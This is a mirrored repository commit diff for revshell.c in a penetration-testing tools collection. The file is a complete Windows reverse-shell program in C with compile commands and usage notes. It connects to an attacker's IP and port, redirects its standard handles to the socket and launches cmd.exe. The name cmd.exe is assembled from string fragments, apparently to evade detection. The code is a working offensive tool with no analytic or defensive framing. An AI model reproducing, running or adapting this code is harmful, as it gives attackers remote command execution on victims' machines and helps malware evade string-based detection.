mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2024-11-21 10:01:38 +01:00
Simple reverse-shell added.
This commit is contained in:
parent
d81f92ad28
commit
e1162690ea
@ -4,12 +4,12 @@
|
||||
*
|
||||
* Compilation:
|
||||
* - x64
|
||||
* $ x86_64-w64-mingw32-gcc revshell.c -ffunction-sections -fdata-sections -s -Os -o revshell.exe -Wl,--gc-sections -lws2_32
|
||||
* $ x86_64-w64-mingw32-gcc revshell.c -ffunction-sections -fdata-sections -s -Os -o revshell.exe -Wl,--gc-sections -lws2_32
|
||||
* - x86
|
||||
* $ i686-w64-mingw32-gcc revshell.c -ffunction-sections -fdata-sections -s -Os -o revshell.exe -Wl,--gc-sections -lws2_32
|
||||
* $ i686-w64-mingw32-gcc revshell.c -ffunction-sections -fdata-sections -s -Os -o revshell.exe -Wl,--gc-sections -lws2_32
|
||||
*
|
||||
* Usage:
|
||||
* cmd> revshell <IP> <PORT> &
|
||||
* cmd> revshell <IP> <PORT> &
|
||||
*
|
||||
* Where:
|
||||
* - ip - remote attacker's server IP
|
||||
@ -21,7 +21,7 @@
|
||||
#include <stdio.h>
|
||||
|
||||
#ifdef _MSC_VER
|
||||
# pragma comment(lib, "ws2_32")
|
||||
# pragma comment(lib, "ws2_32")
|
||||
#endif
|
||||
|
||||
int main(int argc, char *argv[])
|
||||
@ -33,38 +33,38 @@ int main(int argc, char *argv[])
|
||||
|
||||
if (argc < 3)
|
||||
{
|
||||
return 0;
|
||||
}
|
||||
return 0;
|
||||
}
|
||||
|
||||
const char *hostname = argv[1];
|
||||
unsigned int port = atoi(argv[2]);
|
||||
const char *hostname = argv[1];
|
||||
unsigned int port = atoi(argv[2]);
|
||||
|
||||
WSAStartup(MAKEWORD(2,2), &wsaData);
|
||||
wsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
|
||||
WSAStartup(MAKEWORD(2,2), &wsaData);
|
||||
wsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
|
||||
|
||||
struct hostent *host = gethostbyname(hostname);
|
||||
strcpy(saddr, inet_ntoa(*((struct in_addr *)host->h_addr)));
|
||||
strcpy(saddr, inet_ntoa(*((struct in_addr *)host->h_addr)));
|
||||
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = htons(port);
|
||||
sin.sin_addr.s_addr = inet_addr(saddr);
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = htons(port);
|
||||
sin.sin_addr.s_addr = inet_addr(saddr);
|
||||
|
||||
WSAConnect(wsock, (SOCKADDR*)&sin, sizeof(sin), NULL, NULL, NULL, NULL);
|
||||
if (WSAGetLastError() == 0)
|
||||
WSAConnect(wsock, (SOCKADDR*)&sin, sizeof(sin), NULL, NULL, NULL, NULL);
|
||||
if (WSAGetLastError() == 0)
|
||||
{
|
||||
STARTUPINFO sinfo = {0};
|
||||
PROCESS_INFORMATION procinfo = {0};
|
||||
STARTUPINFO sinfo = {0};
|
||||
PROCESS_INFORMATION procinfo = {0};
|
||||
|
||||
sinfo.cb = sizeof(sinfo);
|
||||
sinfo.dwFlags = STARTF_USESTDHANDLES;
|
||||
sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE)wsock;
|
||||
sinfo.cb = sizeof(sinfo);
|
||||
sinfo.dwFlags = STARTF_USESTDHANDLES;
|
||||
sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE)wsock;
|
||||
|
||||
char *cmd[4] = { "cm", "d.e", "x", "e" };
|
||||
char command[8] = "";
|
||||
snprintf(command, sizeof(command), "%s%s%s%s", cmd[0], cmd[1], cmd[2], cmd[3]);
|
||||
char *cmd[4] = { "cm", "d.e", "x", "e" };
|
||||
char command[8] = "";
|
||||
snprintf(command, sizeof(command), "%s%s%s%s", cmd[0], cmd[1], cmd[2], cmd[3]);
|
||||
|
||||
CreateProcess(NULL, command, NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &procinfo);
|
||||
}
|
||||
CreateProcess(NULL, command, NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &procinfo);
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
Loading…
Reference in New Issue
Block a user